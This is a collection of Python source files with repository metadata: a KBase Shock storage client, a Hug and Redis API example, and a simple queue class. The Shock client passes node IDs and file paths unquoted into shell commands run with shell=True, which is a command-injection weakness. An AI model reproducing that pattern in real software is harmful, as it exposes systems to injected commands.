if not (rget.ok and rget.text):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
rj = rget.json()
if not (rj and isinstance(rj, dict) and all([key in rj for key in ['status','data','error']])):
raise Exception(u'Return data not valid Shock format')
if rj['error']:
raise Exception('Shock error: %d: %s'%(rj['status'], rj['error'][0]))
return rj['data']
def download_to_path(self, node, path):
if node == '' or path == '':
raise Exception(u'download_to_path requires non-empty node & path parameters')
if self.transport_method == 'shock-client':
return self._download_shockclient(node, path)
url = '%s/node/%s?download'%(self.shock_url, node)
try:
rget = requests.get(url, headers=self.auth_header, allow_redirects=True, stream = True)
except Exception as e:
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
if not (rget.ok):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
with open(path, 'wb') as f:
for chunk in rget.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
return path
def _download_shockclient(self, node, path):
proc = subprocess.Popen("shock-client pdownload -threads=4 %s %s"%(node,path), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
return_code = proc.wait()
if return_code > 0:
err = ""
for line in proc.stderr:
err += line
raise Exception(u'Error downloading via shock-client: %s => %s: error: %s' %(node, path, err))
else:
return path
def create_node(self, data='', attr=''):
return self.upload("", data, attr)
def upload(self, node='', data='', attr=''):
if self.transport_method == 'shock-client' and node == '' and os.path.exists(data):
res = self._upload_shockclient(data)
if attr == '':
return res
else:
node = res['id']
data = ''
method = 'post'
(data_hdl, attr_hdl) = ('', '')
files = {}
url = self.shock_url+'/node'
if node != '':
url = '%s/%s'%(url, node)
method = 'put'
if data != '':
files['upload'] = self._get_handle(data)
if attr != '':
files['attributes'] = self._get_handle(attr)
try:
req = ""
if method == 'put':
req = requests.put(url, headers=self.auth_header, files=files, allow_redirects=True, stream = True)
else:
req = requests.post(url, headers=self.auth_header, files=files, allow_redirects=True, stream = True)
rj = req.json()
except Exception as e:
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
if not (req.ok):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, req.raise_for_status()))
if rj['error']:
raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
else:
return rj['data']
def _upload_shockclient(self, path):
proc = subprocess.Popen("shock-client pcreate -threads=4 -full %s"%(path), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
return_code = proc.wait()
if return_code > 0:
err = ""
for line in proc.stderr:
err += line
raise Exception(u'Error uploading via shock-client: %s: error: %s' %(path, err))
else:
res = ""
for line in proc.stdout:
if 'Uploading' not in line:
res += line
return json.loads(res)
def list(self, offset=0, limit=10):
url = self.shock_url+'/node/'+'?offset='+str(offset)+'&limit='+str(limit)
try:
rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
except Exception as e:
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
if not (rget.ok and rget.text):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
rj = rget.json()
if rj['error']:
raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
else:
return rj['data']
def get_acl(self, nodeid, type=''):
url = self.shock_url+'/node/'+nodeid+'/acl'
if type != '':
url = url+'/'+type
try:
rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
except Exception as e:
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
if not (rget.ok and rget.text):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
rj = rget.json()
if rj['error']:
raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
else:
return rj['data']
def delete_acl(self, nodeid, userlist, type=''):
url = self.shock_url+'/node/'+nodeid+'/acl'
if type == '':
url = url+'/?all='
else:
url = url+'/?'+type+'='
for user in userlist:
url = url+user # I'm not sure what the separator character is
try:
rdel = requests.delete(url, headers=self.auth_header, allow_redirects=True)
except Exception as e:
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
if not (rdel.ok and rdel.text):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rdel.raise_for_status()))
rj = rdel.json()
if rj['error']:
raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
return
def delete(self, nodeid):
url = self.shock_url+'/node/'+nodeid
try:
rdel = requests.delete(url, headers=self.auth_header, allow_redirects=True)
except Exception as e:
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
if not (rdel.ok and rdel.text):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rdel.raise_for_status()))
rj = rdel.json()
if rj['error']:
raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
return
def query(self, query):
url = self.shock_url+'/node/'+'?query&'+query
try:
rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
except Exception as e:
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
if not (rget.ok and rget.text):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
rj = rget.json()
if rj['error']:
raise Exception(u'Shock error %s : %s'%(rj['status'], rj['error'][0]))
elif rj['total_count'] == 0:
return None
else:
return rj['data']
def _get_handle(self, d):
if os.path.exists(d):
return (os.path.basename(d), open(d))
else:
return ("n/a", cStringIO.StringIO(d))
def _cmd_exists(self, cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
| {
"repo_name": "kbase/probabilistic_annotation",
"path": "lib/biokbase/probabilistic_annotation/Shock.py",
"copies": "1",
"size": "9960",
"license": "mit",
"hash": -7527344736915362000,
"line_mean": 40.1611570248,
"line_max": 161,
"alpha_frac": 0.5144578313,
"autogenerated": false,
"ratio": 3.8029782359679265,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4817436067267926,
"avg_score": null,
"num_lines": null
} |
"""A basic (single function) API written using Hug."""
import hug
import redis
"""
Make sure you have redis installed via pip and redis-cli can connect
example add data first: http://127.0.0.1:8000/redis_add?ape=123456&rname=phrase
example call http://127.0.0.1:8000/redis_call?ape=123456&rname=phrase
"""
r = redis.StrictRedis(host='127.0.0.1', port=6379)
@hug.get('/happy_birthday')
def happy_birthday(name, age: hug.types.number = 1):
"""Says happy birthday to a user."""
return "Happy {age} Birthday {name}!".format(**locals())
@hug.get('/redis_call')
def a_redis_call(rname, ape=1):
"""Simple redis call."""
if ape == 1:
return "no valid api key specified, nice try though".format(**locals())
if r.sismember('ape', ape) != 1:
return "no valid api key specified, nice try though".format(**locals())
else:
coolness = r.get(rname).decode('utf8')
r.decr(ape)
numleft = r.get(str(ape))
print(numleft)
return "Authenticated w {ape}. You have {numleft} queries left. This\
is the {rname} value you requested: {coolness}".format(**locals())
@hug.get('/redis_add')
def add_redis(rname, ape=1):
"""Add to redis int."""
r.sadd('ape', int(ape))
r.set(ape, 1000)
r.set(rname, 'a nice value here')
return "added successfully".format(**locals())
| {
"repo_name": "jamesacampbell/python-examples",
"path": "hug_api_example.py",
"copies": "1",
"size": "1357",
"license": "mit",
"hash": -7611011629491509000,
"line_mean": 31.3095238095,
"line_max": 79,
"alpha_frac": 0.6359616802,
"autogenerated": false,
"ratio": 3.098173515981735,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.42341351961817353,
"avg_score": null,
"num_lines": null
} |
"""A basic, stripped down queue.
"""
import collections as _collections
import collections.abc as _collections_abc
import functools as _functools
# Implementation note: The head of the queue at index 0.
@_functools.total_ordering
# TODO(sredmond): Sized,Iterable,Container is called Collection in 3.6+
class BasicQueue(_collections_abc.Sized, _collections_abc.Iterable, _collections_abc.Container):
def __init__(self, data=None):
self._d = _collections.deque()
if data:
self._d.extend(data)
def __contains__(self, val):
return val in self._d
def __iter__(self):
return iter(self._d)
def __len__(self):
return len(self._d)
# Methods from C++ library
def enqueue(self, value):
self._d.append(value)
def dequeue(self):
if not self._d:
pass
# error("Queue::dequeue: Attempting to dequeue an empty queue")
return self._d.popleft()
def clear(self):
self._d.clear()
def peek(self):
if not self._d:
pass
# error("Queue::dequeue: Attempting to dequeue an empty queue")
return self._d[0]
def back(self):
if not self._d:
pass
# error("Queue::dequeue: Attempting to dequeue an empty queue")
return self._d[-1]
def __str__(self):
return str(self._d).replace('deque', 'BasicQueue', 1)
# TODO(sredmond): Add a repr method?
def __eq__(self, other):
return self._d == other._d
def __le__(self, other):
# TODO(sredmond): There are going to be a lot of problems with unorderable types.
# TODO(sredmond): Isn't this already the default behavior of __le__?
return self._d < other._d
# Synonyms
add = enqueue
remove = dequeue
front = peek
# Removed: isempty, size, equals
__all__ = ['BasicQueue']
| {
"repo_name": "sredmond/acmpy",
"path": "campy/datastructures/basicqueue.py",
"copies": "1",
"size": "1896",
"license": "mit",
"hash": -6297651866067230000,
"line_mean": 25.7042253521,
"line_max": 96,
"alpha_frac": 0.5928270042,
"autogenerated": false,
"ratio": 3.7995991983967934,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48924262025967935,
"avg_score": null,
"num_lines": null
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.